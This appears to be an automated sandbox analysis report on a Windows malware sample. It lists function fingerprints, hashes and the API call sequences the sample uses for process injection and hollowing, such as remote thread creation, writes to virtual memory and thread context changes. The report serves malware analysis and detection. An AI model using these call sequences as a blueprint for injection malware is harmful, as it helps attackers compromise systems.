    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: file2.exe Analysis ID: 66847

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:2B6E31835DAF786F3E9DEEC103C208BB
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:66847
Initial sample SHA 256:B16B34A6AF7AEFE6C0210917A2EC747838573CEA6658CDB6CB3D8F937E70F953
Initial sample name:file.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
